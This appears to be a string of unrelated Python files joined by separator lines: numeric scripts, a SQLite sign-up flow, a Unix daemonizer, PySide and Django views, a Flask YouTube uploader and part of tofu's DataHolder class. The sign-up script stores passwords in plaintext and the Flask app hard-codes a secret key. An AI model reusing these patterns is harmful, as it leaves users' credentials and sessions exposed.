    qval[q] = (T, i)
qmax = max(qval.keys())
(T, i) = qval[qmax]
print("max angle", i)
print("T\n", T)
Ah = A.dot(T.T)
print("Ah\n", np.round(Ah.astype(float), 2))
# Factor scores via the regression method.
F = A.T.dot(np.linalg.inv(R)).dot(XH.T)
print("F\n", np.round(F.astype(float), 2))
|
def sort(li):
    """Sort *li* ascending in place by adjacent swaps and return it."""
    for end in range(1, len(li)):
        pos = end
        # Bubble the new element leftwards until it is no smaller than
        # its left neighbour (classic insertion-by-swaps).
        while pos > 0 and li[pos] < li[pos - 1]:
            li[pos], li[pos - 1] = li[pos - 1], li[pos]
            pos -= 1
    return li
print(sort([74, 32, 89, 55, 21, 64]))
|
import random
# Pick a random hour of day and a random boolean "weather" flag.
time=random.randint(0,23)
TF=random.choice([True,False])
# Korean: "the current time is %d o'clock and the weather is %s".
print("현재 시간은 %d 시 이고 날씨는 %s"%(time,TF))
# Sing ("노래한다") only between 6 and 9 o'clock inclusive when TF is True;
# otherwise print "does not sing" ("노래하지 않는다").
if(time>=6 and time<=9 )and (TF==True):
    print("노래한다")
else:
    print("노래하지 않는다")
|
from getpass import getpass
from validation import *
import sqlite3
# Terminal sign-up flow backed by SQLite; username/password are checked by
# the imported Validation/Authentication helpers before insertion.
conn = sqlite3.connect('data.sqlite')
cur = conn.cursor()
cur.execute('''CREATE TABLE IF NOT EXISTS User
    (id INTEGER PRIMARY KEY, username TEXT, password TEXT) ''')
username = input('Enter username: ')
password = getpass('Enter password: ')
parse = Validation(password)
print(parse.authenticate())
parser = Authentication(username)
print(parser.validate())
# NOTE(review): this `and` combines the two helper *objects*, which are
# always truthy, not the results of authenticate()/validate() printed
# above -- presumably the results were intended; confirm.
parse_4 = parse and parser
if parse_4 :
    cur.execute('INSERT OR IGNORE INTO User (username, password) VALUES (?,?)', (username, password) )
    conn.commit()
else :
    quit()
# Fetch every row except the one just inserted (the max id).
cur.execute('SELECT * FROM User WHERE id != (select max(id)) ')
row = cur.fetchall()
#print(row)
for rows in row :
    for info in rows :
        try :
            if username not in info :
                pass
            else:
                # Username collision: undo the insert and report it.
                cur.execute('DELETE FROM User WHERE username = ?', (username, ) )
                conn.commit()
                print('Username already taken try again')
                break
        # NOTE(review): the bare except is used as control flow -- `in`
        # raises TypeError when `info` is the integer id column, and that
        # is what routes execution into this confirmation branch.
        except :
            con_password = getpass('Confirm password: ')
            if password == con_password :
                print('Signing in ......')
                break
            else:
                # Mismatch: remove the row that was inserted above.
                cur.execute('DELETE FROM User WHERE password = ?', (password, ) )
                conn.commit()
                print ('Password not matched')
cur.close()
|
import os, sys, signal
from fabric.api import settings, local
from secrets import BASE_DIR
MONITOR_DIR = os.path.join(BASE_DIR, ".monitor")
def startDaemon(log_file, pid_file):
    # Detach the current process as a UNIX daemon via the classic
    # double-fork: fork and exit the parent, start a new session, fork
    # again, record the grandchild's pid, then redirect the standard
    # streams into log_file.  Python 2 syntax (print statement, file(),
    # `except OSError, e`).
    print "DAEMONIZING PROCESS>>> (STDIN %d)" % sys.stdin.fileno()
    try:
        pid = os.fork()
        if pid > 0:
            # First parent exits; the child continues detached.
            sys.exit(0)
    except OSError, e:
        print e.errno
        sys.exit(1)
    # Detach from the controlling terminal and any mounted directory.
    os.chdir("/")
    os.setsid()
    os.umask(0)
    try:
        pid = os.fork()
        if pid > 0:
            # Second parent records the daemon's pid, then exits.
            f = open(pid_file, 'w')
            f.write(str(pid))
            f.close()
            sys.exit(0)
    except OSError, e:
        print e.errno
        sys.exit(1)
    # Re-point stdin at /dev/null and stdout/stderr at the log file
    # (stderr unbuffered via bufsize 0).
    si = file('/dev/null', 'r')
    so = file(log_file, 'a+')
    se = file(log_file, 'a+', 0)
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())
    print ">>> PROCESS DAEMONIZED"
def stopDaemon(pid_file, extra_pids_port=None):
    # Stop the daemon recorded in pid_file with SIGTERM; when
    # extra_pids_port is given, also kill every process listening on that
    # port (found via `lsof -t`).  Returns True on success, False when no
    # pid could be read or the kill failed.  Python 2 syntax.
    from subprocess import Popen, PIPE
    pid = False
    try:
        f = open(pid_file, 'r')
        try:
            pid = int(f.read().strip())
        except ValueError as e:
            print "NO PID AT %s" % pid_file
    except IOError as e:
        print "NO PID AT %s" % pid_file
    if pid:
        print "STOPPING DAEMON on pid %d" % pid
        try:
            os.kill(pid, signal.SIGTERM)
            if extra_pids_port is not None:
                # lsof -t prints one pid per line for the given port.
                pids = Popen(['lsof', '-t', '-i:%d' % int(extra_pids_port)], stdout=PIPE)
                pid = pids.stdout.read().strip()
                pids.stdout.close()
                for p in pid.split("\n"):
                    cmd = ['kill', str(p)]
                    Popen(cmd)
            return True
        except OSError as e:
            print "could not kill process at PID %d" % pid
    return False
class POEException(Exception):
    """Application-level error for the proof-of-existence app."""
    def __init__(self, value):
        # Keep the offending value around for inspection/formatting.
        self.value = value
    def __str__(self):
        return "%r" % (self.value,)
class ProofOfExistenceApp():
    # Lifecycle wrapper around the notary web app: start() daemonizes the
    # WSGI server in a child process, stop() tears it down via the pid
    # file.  Python 2 syntax throughout.
    def __init__(self):
        print "new notary instance"
        self.in_service = False
    def start_app(self):
        # Runs inside the forked child: daemonize, connect rom's redis
        # backend, then serve self.api over paste's httpserver.
        import redis
        from rom import util
        from paste import httpserver
        startDaemon(os.path.join(MONITOR_DIR, "app.log"), os.path.join(MONITOR_DIR, "app.pid"))
        try:
            util.CONNECTION = redis.Redis(host="localhost", db=0)
            httpserver.serve(self.api, host="localhost", port=os.environ.get('API_PORT', 8700))
        except AttributeError as e:
            print e, type(e)
    def start(self):
        # Import the flask/wsgi app and launch start_app in a separate
        # process.  Returns False when the import or launch fails.
        print "starting app"
        try:
            from main import app
        except Exception as e:
            print e, type(e)
            return False
        from multiprocessing import Process
        from fabric.api import settings, local
        try:
            # START API
            self.api = app
            p = Process(target=self.start_app)
            p.start()
            p.join()
            # START CRON (disabled)
            '''
            with settings(warn_only=True):
                local("crontab %s" % os.path.join(BASE_DIR, "cron.tab"))
            '''
            return True
        except Exception as e:
            print e, type(e)
            return False
    def stop(self):
        # Kill the daemonized server (and anything bound to API_PORT).
        print "stopping app"
        '''
        with settings(warn_only=True):
            local("crontab -r")
        '''
        return stopDaemon(os.path.join(MONITOR_DIR, "app.pid"), extra_pids_port=os.environ.get('API_PORT', None))
if __name__ == "__main__":
    # CLI entry point: app.py [start|stop|restart]; "restart" triggers
    # stop followed by start.  Exit status 0 on success, -1 otherwise.
    usage_prompt = "usage: app.py [start|stop|restart] --base-dir=/path/to/configs/dir"
    if len(sys.argv) < 2:
        print usage_prompt
        sys.exit(-1)
    res = False
    app = ProofOfExistenceApp()
    if sys.argv[1] in ["restart", "stop"]:
        res = app.stop()
    if sys.argv[1] in ["restart", "start"]:
        res = app.start()
    sys.exit(0 if res else -1)
|
import os
from collections import defaultdict
import logging
import numpy as np
from PySide import QtGui, QtCore
from PySide.QtCore import Qt
from pubsub import pub
from ..models import model
from ..settings import settings
from treewidgetitem import TreeWidgetItem
class Singleton(object):
    """Mixin caching the first created instance on the class.

    Later constructions return the cached object; the ``isinstance`` test
    means a subclass still gets its own (more specific) instance the first
    time it is instantiated.
    """
    _instance = None
    def __new__(class_, *args, **kwargs):
        if not isinstance(class_._instance, class_):
            # Bug fix: object.__new__ must not be given the constructor
            # arguments -- forwarding them raises TypeError on Python 3
            # (and was already deprecated on Python 2).  The arguments
            # still reach __init__ unchanged.
            class_._instance = object.__new__(class_)
        return class_._instance
class MeasurementTree(QtGui.QWidget, Singleton):
    """Singleton side-panel widget listing measurements and their contacts.

    Shows a five-column tree (Name, Label, Length, Surface, Force) and
    keeps the model's current measurement/contact in sync with the
    selection.  Refreshes itself on the "update_measurement_status"
    pubsub topic.
    """
    def __init__(self, parent=None):
        super(MeasurementTree, self).__init__(parent)
        self.model = model.model
        self.colors = settings.settings.colors
        self.contact_dict = settings.settings.contact_dict
        # Create a list widget
        self.measurement_tree = QtGui.QTreeWidget(self)
        self.measurement_tree.setMinimumWidth(300)
        self.measurement_tree.setMaximumWidth(300)
        self.measurement_tree.setColumnCount(5)
        self.measurement_tree.setHeaderLabels(["Name", "Label", "Length", "Surface", "Force"])
        self.measurement_tree.itemActivated.connect(self.item_activated)
        self.measurement_tree.setItemsExpandable(False)
        # Set the widths of the columns
        self.measurement_tree.setColumnWidth(0, 75)
        for column in xrange(1, self.measurement_tree.columnCount()):
            self.measurement_tree.setColumnWidth(column, 55)
        self.layout = QtGui.QVBoxLayout()
        self.layout.addWidget(self.measurement_tree)
        self.setLayout(self.layout)
        pub.subscribe(self.update_measurements_tree, "update_measurement_status")
    def select_initial_measurement(self):
        """Select the first measurement in the tree and push it to the model."""
        self.current_measurement_index = 0
        measurement_item = self.measurement_tree.topLevelItem(self.current_measurement_index)
        self.measurement_tree.setCurrentItem(measurement_item, True)
        # We need to set a measurement name, before we can get contacts from it
        self.put_measurement()
        # For the current measurement, select the first of each contact labels (if available)
        self.select_initial_contacts()
    def select_initial_contacts(self):
        """Put the first contact of each label 0-3 for the current measurement."""
        measurement_item = self.measurement_tree.currentItem()
        # If the tree is empty, there's nothing to select
        if measurement_item is None:
            return
        measurement_name = measurement_item.text(0)
        # One slot per contact label; flipped to 1 once a contact is put.
        lookup = {0: 0, 1: 0, 2: 0, 3: 0}
        for index in range(measurement_item.childCount()):
            contact = self.model.contacts[measurement_name][index]
            if contact.contact_label in lookup and not lookup[contact.contact_label]:
                self.model.put_contact(contact_id=contact.contact_id)
                lookup[contact.contact_label] = 1
    # TODO I should split this function up, such that reloading the tree is independent of setting indices and such
    def update_measurements_tree(self):
        """Rebuild the whole tree from the model and restore the selection."""
        self.measurement_tree.clear()
        # Create a green brush for coloring stored results
        green_brush = QtGui.QBrush(QtGui.QColor(46, 139, 87))
        current_measurement_item = None
        for measurement in self.model.measurements.values():
            # NOTE(review): the measurement object is passed as the label
            # list here; the texts are overwritten just below -- confirm
            # this constructor call is intentional.
            measurement_item = QtGui.QTreeWidgetItem(self.measurement_tree, [measurement])
            measurement_item.setText(0, measurement.measurement_name)
            measurement_item.setText(1, measurement.measurement_id)
            measurement_item.setFirstColumnSpanned(True)
            measurement_item.setExpanded(True)
            # If we reach the current measurement, store a reference to that measurement item
            if measurement.measurement_name == self.model.measurement_name:
                current_measurement_item = measurement_item
            for contact in self.model.contacts[measurement.measurement_name]:
                contact_item = TreeWidgetItem(measurement_item)
                contact_item.setText(0, str(contact.contact_id.split("_")[-1]))
                contact_item.setText(1, self.contact_dict[contact.contact_label])
                contact_item.setText(2, str(contact.length))  # Sets the frame count
                max_surface = np.max(contact.surface_over_time)
                contact_item.setText(3, str(int(max_surface)))
                max_force = np.max(contact.force_over_time)
                contact_item.setText(4, str(int(max_force)))
                # Invalid contacts get a reserved color; others by label.
                if contact.invalid:
                    color = self.colors[-3]
                else:
                    color = self.colors[contact.contact_label]
                color.setAlphaF(0.5)
                for idx in xrange(contact_item.columnCount()):
                    contact_item.setBackground(idx, color)
            # If several contacts have been labeled, marked the measurement
            if measurement.processed:
                for idx in xrange(measurement_item.columnCount()):
                    measurement_item.setForeground(idx, green_brush)
        if current_measurement_item:
            # Scroll the tree to the current measurement item
            self.measurement_tree.scrollToItem(current_measurement_item, hint=QtGui.QAbstractItemView.PositionAtTop)
        # Sort the tree by measurement name
        self.measurement_tree.sortByColumn(0, Qt.AscendingOrder)
        # Initialize the current contact index, which we'll need for keep track of the labeling
        self.model.current_contact_index = 0
        #self.model.current_measurement_index = 0
        measurement_item = self.get_current_measurement_item()
        self.measurement_tree.setCurrentItem(measurement_item, True)
    def update_current_contact(self):
        """Highlight the model's current contact under the current measurement."""
        measurement_item = self.get_current_measurement_item()
        contact_item = measurement_item.child(self.model.current_contact_index)
        self.measurement_tree.setCurrentItem(contact_item)
    def item_activated(self):
        """Dispatch activation: child items are contacts, top-level are measurements."""
        # Check if the tree aint empty!
        if not self.measurement_tree.topLevelItemCount():
            return
        current_item = self.measurement_tree.currentItem()
        if current_item.parent():
            self.put_contact()
        else:
            self.put_measurement()
    # TODO Change this so it first checks what we clicked on and then calls the right function
    def put_measurement(self):
        """Push the selected top-level measurement into the model."""
        # Check if the tree aint empty!
        if not self.measurement_tree.topLevelItemCount():
            return
        current_item = self.measurement_tree.currentItem()
        # Only put the measurement if we selected a measurement
        if current_item.parent():
            return
        # TODO what did I need this for again?
        self.model.current_measurement_index = self.measurement_tree.indexOfTopLevelItem(current_item)
        # Notify the model to update the subject_name + measurement_name if necessary
        measurement_id = current_item.text(1)
        self.model.put_measurement(measurement_id=measurement_id)
    def put_contact(self):
        """Push the selected contact (and its parent measurement) into the model."""
        # Check to make sure the measurement is selected first
        current_item = self.measurement_tree.currentItem()
        measurement_item = current_item.parent()
        self.measurement_tree.setCurrentItem(measurement_item)
        self.put_measurement()
        # Now put the contact
        #contact_id = int(current_item.text(0))  # Convert the unicode to int
        contact_id = "contact_{}".format(current_item.text(0))
        for index, contact in enumerate(self.model.contacts[self.model.measurement_name]):
            if contact.contact_id == contact_id:
                self.model.current_contact_index = index
        self.model.put_contact(contact_id=contact_id)
    def get_current_measurement_item(self):
        """Return the tree item for the model's current measurement index."""
        return self.measurement_tree.topLevelItem(self.model.current_measurement_index)
class TreeWidgetItem(QtGui.QTreeWidgetItem):
    """
    Tree item that sorts on the numeric suffix of its text (the part after
    the last underscore) instead of lexicographically, so contact ids order
    as numbers.  Based on:
    http://stackoverflow.com/questions/21030719/sort-a-pyside-qtgui-qtreewidget-by-an-alpha-numeric-column
    """
    def __lt__(self, other):
        col = self.treeWidget().sortColumn()
        left = int(self.text(col).split("_")[-1])
        right = int(other.text(col).split("_")[-1])
        return left < right
|
# Create your views here.
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import register_converter
from django.views.decorators.csrf import csrf_exempt
from .form import LoginForm
from django.contrib.auth import authenticate, login
from . import converters
from .models import comment
def myyear(request, year):
    """Render the year view template; *year* comes from the URL but is unused."""
    return render(request, 'yearview.html')
# Render the movie-comment data into the template.
def movie_comment(request):
    """List comments rated above three stars on the index page."""
    #condtions = {'stars__gt': 3}
    n = comment.objects.filter(stars__gt=3).all()
    #comments = n.comment_text[0]
    # locals() passes every local (request, n) as the template context.
    return render(request, 'index.html', locals())
# Feed the search button's results into the template.
def search(request):
    """Case-insensitively search comments for the ``q`` GET parameter.

    Renders an error page (with a "please enter a keyword" message) when
    the query is missing or empty.
    """
    q = request.GET.get('q')
    print(q)
    error_msg = ''
    # ``not q`` already covers both None (parameter absent) and the empty
    # string, so the original's redundant ``or q == ''`` is dropped.
    if not q:
        error_msg = '请输入关键词'
        return render(request, 'errors.html', {'error_msg': error_msg})
    n = comment.objects.filter(comment_text__icontains=q)
    return render(request, 'index.html',locals())
def login(request):
    """Validate the login form and authenticate the user.

    NOTE(review): this view shadows ``login`` imported from
    django.contrib.auth above, so the commented-out ``login(request, user)``
    call below would recurse into this view instead of creating a session.
    Also note the implicit None return for non-GET/POST requests and for
    an invalid POSTed form -- confirm both are intended.
    """
    if request.method == 'POST':
        login_form = LoginForm(request.POST)
        if login_form.is_valid():
            # Read the validated values back out of the form.
            cd = login_form.cleaned_data
            if len(cd['password'])<2:
                raise ValidationError('Password too short')
            user = authenticate(username=cd['username'], password=cd['password'])
            if user:
                # Log the user in (session creation currently disabled).
                #login(request, user)
                return render(request, 'result2.html', locals())
                #HttpResponse('登录成功')
            else:
                return HttpResponse('登录失败')
    if request.method == "GET":
        login_form = LoginForm()
        return render(request, 'form.html', {'form': login_form})
# Initial regression weights.  NOTE(review): only nw0/nw1/nw2 (defined
# further down, after one manual update step) are used in the visible
# code -- w1/w2 appear to be the starting point of the iteration; confirm.
w0 = -59.50
w1 = -0.15
w2 = 0.60
def t(o, a, h, p):
    """Return the residual d = o - p alongside its square and its products
    with a and h: [d, d**2, d, d*a, d*h] (gradient-term components)."""
    residual = o - p
    return [residual, residual ** 2, residual, residual * a, residual * h]
# Rows: [observed, a, h, predicted] -- the last column is replaced below
# with the model's own prediction before the second pass.
data = [[37.99, 41, 138, 17.15],
        [47.34, 42, 133, 26.00],
        [44.38, 37, 151, 25.55],
        [28.17, 46, 133, 13.40],
        [27.07, 48, 126, 8.90],
        [37.85, 44, 145, 20.90],
        [44.72, 43, 158, 28.85],
        [36.42, 46, 143, 19.40],
        [31.21, 37, 138, 17.75],
        [54.85, 38, 158, 29.60],
        [39.84, 43, 143, 19.85],
        [30.83, 43, 138, 16.85]]
#use ocr tool to do that
# First pass: column-wise sums of the residual terms produced by t().
l=list()
for i in data:
    l.append(t(i[0], i[1], i[2], i[3]))
for i in range(5):
    s=0
    for o in range(len(l)):
        s+=l[o][i]
    print("{}".format(s),end="\t")
print()
# Updated weights after one manual gradient step.
nw0 = -59.50
nw1 = -0.1313714
nw2 = 0.6627366
# Replace the predicted column with the updated model's predictions.
for i in range(len(data)):
    data[i][3]=nw0+nw1*data[i][1]+nw2*data[i][2]
# Second pass: recompute the residual-term sums with the new predictions.
l=list()
for i in data:
    l.append(t(i[0], i[1], i[2], i[3]))
for i in range(5):
    s=0
    for o in range(len(l)):
        s+=l[o][i]
    print("{}".format(s),end="\t")
|
if __name__ == "__main__":
    # Demonstrate updating a nested dict: merge user2 into the inner
    # dict stored under 'username'.
    device_dict = {}
    user = {'username':{'1':'2'}}
    user2 = {'3':'4'}
    device_dict.update(user)
    # NOTE(review): .get('username', 0) would hand back the int 0 (which
    # has no .update) if the key were missing; this only works because
    # 'username' was just added above.
    device_dict.get('username',0).update(user2)
    print(device_dict)
"""Noisebyte uploader flask app"""
import os
import binascii
from subprocess import call
import threading
from secrets import APPROVE_SLACK_TOKEN, TRASH_SLACK_TOKEN, SLACK_WEBHOOK_URL, FLASK_SECRET_KEY
from flask import Flask, request, redirect, flash, render_template
import requests
import youtube_uploader
# Staging directories for raw uploads and processed output, plus the
# accepted video container extensions.
UPLOAD_FOLDER = './uploads'
TEMP_FOLDER = './temp'
ALLOWED_EXTENSIONS = set(['mov', 'mp4', 'avi', 'mkv', 'wmv', 'mpeg4', 'mpg'])
# URL prefix the app is mounted under (used by the redirects below).
BASE_ADDR='/noisebytes/'
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
app.url_map.strict_slashes = False
app.secret_key = FLASK_SECRET_KEY
def youtube_video_url(id):
    """Return the public YouTube watch URL for the given video id."""
    return 'https://www.youtube.com/watch?v={0}'.format(id)
def log_to_slack(msg):
    """Post *msg* to the #noisebytes Slack channel via the incoming webhook.

    Returns the requests.Response from the webhook call.
    """
    body = dict(
        channel="#noisebytes",
        username="noisebytes-moderation-bot",
        text=msg,
        icon_emoji=":vibration_mode:",
    )
    return requests.post(SLACK_WEBHOOK_URL, json=body)
@app.route("/slack/approve", methods=['POST'])
def approve_command_handler():
    """Slack slash-command endpoint: approve the video id given as text."""
    form = request.form
    if form['token'] != APPROVE_SLACK_TOKEN:
        return ':('
    video_id = form['text']
    user = form['user_name']
    outcome = youtube_uploader.approve_video(video_id)
    if outcome == "Approved":
        log_to_slack(user + ' approved video ' + youtube_video_url(video_id))
        return "Video successfully approved"
    if outcome == "AlreadyApproved":
        return "That video has already been approved :)"
    return "Unknown return value, please contact @beka and/or @rizend"
@app.route("/slack/trash", methods=['POST'])
def trash_command_handler():
    """Slack slash-command endpoint: trash the video id given as text."""
    form = request.form
    if form['token'] != TRASH_SLACK_TOKEN:
        return ':('
    video_id = form['text']
    user = form['user_name']
    outcome = youtube_uploader.trash_video(video_id)
    if outcome == "Trashed":
        log_to_slack(user + ' trashed video ' + youtube_video_url(video_id))
        return "Video successfully trashed"
    if outcome == "AlreadyTrashed":
        return "That video has already been trashed :)"
    return "Unknown return value, please contact @beka and/or @rizend"
def title_of_processed_video(title, author):
    """Compose the public YouTube title for a processed clip."""
    return "Noisebytes - {0} by {1}".format(title, author)
def description_of_video(title, author):
    """Build the YouTube description body for an uploaded clip."""
    # The fixed tail never changes between videos; only the title/author
    # header varies.
    boilerplate = (
        "Patreon: https://patreon.com/noisebridge\n"
        "Website: https://noisebridge.net/\n\n"
        "Noisebridge is a 501(c)3 non-profit hackerspace in San Francisco's Mission District, located at 2169 Mission St.\n\n"
        "We're open to the public every day from 11am to 10pm, so feel free to drop by!\n\n"
        "We're also funded entirely by the community, so please donate if you like what we do, or the content we produce.\n\n"
        "Noisebridge is a safe space. You can read about what that means to us at the pages listed here: https://www.noisebridge.net/wiki/Safe_Space"
    )
    return "Title: " + title + "\n" + "Author: " + author + "\n" + boilerplate
def random_name():
    """Return 32 hex characters derived from 16 cryptographically random bytes."""
    # hexlify is the documented alias of b2a_hex.
    return binascii.hexlify(os.urandom(16))
def allowed_file(filename):
    """Return True when *filename* has an extension in ALLOWED_EXTENSIONS."""
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file_handler():
    # GET renders the upload form; POST validates the submitted file,
    # saves it under a random name, and hands transcoding + YouTube
    # upload + cleanup to a background thread.  Python 2 print syntax.
    if request.method == 'POST':
        # check if the post request has the file part
        if 'file' not in request.files:
            flash('No file part')
            print "No file part"
            return redirect(BASE_ADDR)
        posted_file = request.files['file']
        if posted_file.filename == '':
            flash('No selected file')
            print "No selected file"
            return redirect(BASE_ADDR)
        if not allowed_file(posted_file.filename):
            flash('Invalid file type. Try these: ' + ' '.join(x for x in ALLOWED_EXTENSIONS))
            print "Invalid file type"
            return redirect(BASE_ADDR)
        if posted_file:
            flash('Your file is uploading.')
            title = request.form['title']
            author = request.form['author']
            # Random name avoids collisions and path-injection from the
            # user-supplied filename; only the extension is reused.
            temp_name = random_name()
            extension = posted_file.filename.rsplit('.', 1)[1].lower()
            upload_file = os.path.join(UPLOAD_FOLDER, temp_name + '.' + extension)
            processed_file = os.path.join(TEMP_FOLDER, temp_name + '.mp4')
            posted_file.save(upload_file)
            def upload_to_youtube_thread():
                # Transcode, upload, announce on Slack, then delete both
                # the raw and processed files.  Closes over the locals above.
                call(["bash", "./process_video.sh", title, author,
                      upload_file,
                      processed_file])
                video_id = youtube_uploader.upload_video(title_of_processed_video(title, author),
                                                         description_of_video(title, author),
                                                         processed_file)
                if video_id:
                    log_to_slack("Video " + youtube_video_url(video_id) + " ready for moderation. " +
                                 "You can approve it by typing `/approve_noisebyte " + video_id + "`, or trash it "+
                                 "by typing `/trash_noisebyte " + video_id + "`")
                else:
                    log_to_slack("An error was encountered while uploading a video")
                os.remove(upload_file)
                os.remove(processed_file)
            threading.Thread(target=upload_to_youtube_thread).start()
            return redirect(BASE_ADDR)
    return render_template('uploader_app.html')
if __name__ == '__main__':
    # NOTE(review): this overwrites the FLASK_SECRET_KEY configured above
    # with a hard-coded value -- presumably leftover debug code; confirm
    # before deploying.
    app.secret_key = 'super secret key'
    app.config['SESSION_TYPE'] = 'filesystem'
    app.run(host="127.0.0.1", port=int("3114"), debug=False)
|
# Public API of this module.
__all__ = ['CommError']
class CommError(Exception):
    """Serious low-level communication failure.

    Only raised for errors severe enough that the top-level event loop
    should close/cleanup/destroy any running command.  The error message
    is returned on distxt.
    """
    def __init__(self, device, error, details=None):
        """Build a CommError.

        Args:
            device - name of the device that had an error.
            error - one line of text, intended for users. Will be returned on distxt.
            details - optional text, intended for operators/programmers. Will be returned on diserrtxt.
        """
        Exception.__init__(self)
        self.device = device
        self.error = error
        self.details = details
        # args mirrors the positional arguments; details is appended only
        # when truthy so the two-argument form stays compact.
        self.args = (device, error, details) if details else (device, error)
|
import unittest
from backend.managers.logic import LogicManager
class TestLogicManager(unittest.TestCase):
    """Placeholder test case for LogicManager; no tests implemented yet."""
    def setUp(self):
        # Intentionally empty: no fixtures are required yet.
        pass
|
class calculate:
    """Convert hexadecimal strings to a binary-digit representation."""

    def __init__(self):
        # No state is needed; instances exist only to call make().
        pass

    def make(self, str):
        """Return the binary form of hex string *str* as a base-10 integer.

        e.g. make("0A") -> 1010, make("F") -> 1111, make("") -> 0.

        Fixes the original's crash on lowercase hex digits (its manual
        digit table only mapped 'A'-'F', so int('a') raised ValueError)
        by delegating to int(..., 16), and replaces the hand-rolled
        divide-by-2 loop with bin().
        """
        if not str:
            # The original loop over an empty string yielded 0; keep that.
            return 0
        value = int(str, 16)
        # bin() gives e.g. '0b1010'; strip the prefix and reinterpret the
        # digit string as a decimal int, matching the original convention.
        return int(bin(value)[2:])
# str = "0A"
# m = calculate()
# y = calculate.make(m, str)
# print(y)
|
# -*- coding: utf-8 -*-
# Built-in
import sys
import os
# import itertools as itt
import copy
import warnings
from abc import ABCMeta, abstractmethod
import inspect
# Common
import numpy as np
# import scipy.interpolate as scpinterp
# import matplotlib.pyplot as plt
# from matplotlib.tri import Triangulation as mplTri
# tofu
from tofu import __version__ as __version__
import tofu.pathfile as tfpf
import tofu.utils as utils
try:
import tofu.data._comp as _comp
import tofu.data._plot as _plot
import tofu.data._def as _def
import tofu._physics as _physics
except Exception:
from . import _comp as _comp
from . import _plot as _plot
from . import _def as _def
from .. import _physics as _physics
# Public API, default save location, and default time-interpolation scheme.
__all__ = ['DataHolder'] # , 'Plasma0D']
_SAVEPATH = os.path.abspath('./')
_INTERPT = 'zero'
#############################################
#############################################
# Abstract Parent class
#############################################
#############################################
class DataHolder(utils.ToFuObject):
    """ A generic class for handling data

    Provides methods for:
        - introspection
        - plateaux finding
        - visualization

    Internally it keeps three cross-referencing dictionaries:
    groups (_dgroup), references (_dref) and data arrays (_ddata).
    """

    # Fixed (class-wise) dictionary of default properties:
    # reserved key names per dictionary, plus (type, default) pairs for
    # the minimal per-data parameters.
    _ddef = {'Id': {'include': ['Mod', 'Cls',
                                'Name', 'version']},
             'dgroup': ['lref'],
             'dref': ['group', 'size', 'ldata'],
             'ddata': ['refs', 'shape', 'groups', 'data'],
             'params': {'origin': (str, 'unknown'),
                        'dim': (str, 'unknown'),
                        'quant': (str, 'unknown'),
                        'name': (str, 'unknown'),
                        'units': (str, 'a.u.')}}

    # Key names users may never use as free parameters.
    _reserved_all = _ddef['dgroup'] + _ddef['dref'] + _ddef['ddata']
    _show_in_summary = 'all'
    def __init_subclass__(cls, **kwdargs):
        # Give every subclass its own deep copy of the class defaults so
        # subclass edits never leak back into DataHolder._ddef.
        # Does not exist before Python 3.6 !!!
        # Python 2
        super(DataHolder, cls).__init_subclass__(**kwdargs)
        # Python 3
        # super().__init_subclass__(**kwdargs)
        cls._ddef = copy.deepcopy(DataHolder._ddef)
        # cls._dplot = copy.deepcopy(Struct._dplot)
        # cls._set_color_ddef(cls._color)
    def __init__(self, dref=None, ddata=None,
                 Id=None, Name=None,
                 fromdict=None, SavePath=os.path.abspath('./'),
                 SavePath_Include=tfpf.defInclude):
        """Build a DataHolder from ref/data dicts or a serialized dict.

        All keyword arguments are forwarded unchanged to the
        utils.ToFuObject constructor.
        """
        # Create a dplot at instance level
        # self._dplot = copy.deepcopy(self.__class__._dplot)
        # locals() captures the full keyword-argument set above so it can
        # be forwarded to the parent constructor in one go.
        kwdargs = locals()
        del kwdargs['self']
        # super()
        super(DataHolder, self).__init__(**kwdargs)
def _reset(self):
# Run by the parent class __init__()
# super()
super(DataHolder, self)._reset()
self._dgroup = {kd[0]: kd[1] for kd in self._get_keys_dgroup()}
self._dref = {kd[0]: kd[1] for kd in self._get_keys_dref()}
self._ddata = {kd[0]: kd[1] for kd in self._get_keys_ddata()}
    @classmethod
    def _checkformat_inputs_Id(cls, Id=None, Name=None,
                               include=None, **kwdargs):
        """Normalize Id/Name/include inputs into a kwdargs dict.

        A provided Id (utils.ID) overrides Name; include defaults to the
        class-level _ddef['Id']['include'] list.
        """
        if Id is not None:
            assert isinstance(Id, utils.ID)
            Name = Id.Name
        assert isinstance(Name, str), Name
        if include is None:
            include = cls._ddef['Id']['include']
        kwdargs.update({'Name': Name, 'include': include})
        return kwdargs
###########
# Get largs
###########
@staticmethod
def _get_largs_dref():
largs = ['dref']
return largs
@staticmethod
def _get_largs_ddata():
largs = ['ddata']
return largs
###########
# Get check and format inputs
###########
# ---------------------
# Methods for checking and formatting inputs
# ---------------------
def _extract_known_params(self, key, dd):
# Extract relevant parameters
dparams = {kk: vv for kk, vv in dd.items()
if kk not in self._reserved_all}
# Add minimum default parameters if not already included
for kk, vv in self._ddef['params'].items():
if kk not in dparams.keys():
dparams[kk] = vv[1]
else:
# Check type if already included
if not isinstance(dparams[kk], vv[0]):
vtyp = str(type(vv[0]))
msg = "A parameter for %s has the wrong type:\n"%key
msg += " - Provided: type(%s) = %s\n"%(kk, vtyp)
msg += " - Expected %s"%str(self._ddef['params'][kk][0])
raise Exception(msg)
return dparams
def _checkformat_dref(self, dref):
c0 = isinstance(dref, dict)
c0 = c0 and all([isinstance(kk, str) and isinstance(vv, dict)
for kk, vv in dref.items()])
if not c0:
msg = "Provided dref must be dict !\n"
msg += "All its keys must be str !\n"
msg += "All its values must be dict !"
raise Exception(msg)
# Two options:
# (A) - {'group0':{'t0':{'data':t0, 'units':'s'}, 't1':...}}
# (B) - {'t0':{'data':t0, 'units':'s', 'group':'group0'}, 't1':...}
cA = all([all([(isinstance(v1, dict) and 'group' not in v1.keys())
or not isinstance(v1, dict)
for v1 in v0.values()])
and 'group' not in v0.keys() for v0 in dref.values()])
cB = all([isinstance(v0.get('group', None), str)
for v0 in dref.values()])
if not (cA or cB):
msg = "Provided dref must formatted either as a dict with:\n\n"
msg += " - keys = group, values = {ref: data}:\n"
msg += " {'g0':{'t0':{'data':t0, 'units':'s'},\n"
msg += " 't1':{'data':t1, 'units':'h'}},\n"
